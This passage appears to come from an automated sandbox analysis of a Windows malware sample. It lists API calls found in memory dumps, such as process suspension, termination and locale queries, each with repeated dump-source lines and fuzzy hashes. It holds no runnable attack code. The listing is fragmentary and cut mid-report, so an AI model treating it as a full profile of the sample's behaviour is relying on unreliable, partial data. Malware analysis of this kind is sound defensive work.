                              • GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
                              • TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
                              • ExitProcess.KERNEL32 ref: 0044258E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CurrentExitTerminate
                              • String ID:
                              • API String ID: 1703294689-0
                              • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                              • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                              • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                              • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                              APIs
                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150C3,00000000), ref: 0041ACCC
                              • NtSuspendProcess.NTDLL(00000000), ref: 0041ACD9
                              • CloseHandle.KERNEL32(00000000,?,?,004150C3,00000000), ref: 0041ACE2
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseHandleOpenSuspend
                              • String ID:
                              • API String ID: 1999457699-0
                              • Opcode ID: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                              • Instruction ID: f0940f0a464cb9da12e036c8bcda16370f3965740af83b573a45ae51f9acba0f
                              • Opcode Fuzzy Hash: 25604720b1c4003eaa4d94084830c6d0564ffd887a8d5c6f711170065f3891c4
                              • Instruction Fuzzy Hash: E7D0A733605131638221176A7C0CC87EE6CDFC1EB37024136F404C3220DA30C84186F4
                              APIs
                              • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,004150E8,00000000), ref: 0041ACF8
                              • NtResumeProcess.NTDLL(00000000), ref: 0041AD05
                              • CloseHandle.KERNEL32(00000000,?,?,004150E8,00000000), ref: 0041AD0E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$CloseHandleOpenResume
                              • String ID:
                              • API String ID: 3614150671-0
                              • Opcode ID: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                              • Instruction ID: b64f47c6af987b25b68fadd97e6a7e629856a7b738c344dffca8a71896aa998e
                              • Opcode Fuzzy Hash: ac01971c7a5820b8bc970b7b2339e0980474906f6b9316b65cb607f099f400ad
                              • Instruction Fuzzy Hash: DFD0A733504132638220176A7C0CC87EDADDFC5EB37024236F404C3621DA34C841C6F4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .
                              • API String ID: 0-248832578
                              • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                              • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                              • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                              • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID: <D
                              • API String ID: 1084509184-3866323178
                              • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                              • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID: <D
                              • API String ID: 1084509184-3866323178
                              • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                              • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                              APIs
                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID: GetLocaleInfoEx
                              • API String ID: 2299586839-2904428671
                              • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                              • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                              • Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
                              • Opcode Fuzzy Hash: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
                              • Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
                              APIs
                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionRaise
                              • String ID:
                              • API String ID: 3997070919-0
                              • Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                              • Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
                              • Opcode Fuzzy Hash: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
                              • Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                              • Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
                              • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                              • Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$_free$InfoLocale_abort
                              • String ID:
                              • API String ID: 1663032902-0
                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$InfoLocale_abort_free
                              • String ID:
                              • API String ID: 2692324296-0
                              • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                              • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                              APIs
                                • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                              • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: CriticalEnterEnumLocalesSectionSystem
                              • String ID:
                              • API String ID: 1272433827-0
                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                              • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                              • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                              • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                              APIs
                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                              • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                              • String ID:
                              • API String ID: 1084509184-0
                              • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                              • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                              • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                              • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                              APIs
                              • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoLocale
                              • String ID:
                              • API String ID: 2299586839-0
                              • Opcode ID: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                              • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                              • Opcode Fuzzy Hash: 2f0bd58ff2c46692be8fd04023cab22914861fe3b087e1ba55e03f3e1b92ba33
                              • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
                              • API String ID: 3192549508-0
                              • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                              • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                              • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                              • Instruction Fuzzy Hash:
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: BG3i@
                              • API String ID: 0-2407888476
                              • Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                              • Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
                              • Opcode Fuzzy Hash: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
                              • Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.4758718698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.4758702445.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758779955.0000000000473000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.4758814845.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb93.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 0
                              • API String ID: 0-4108050209
                              • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                              • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                              • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                              • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                              Strings
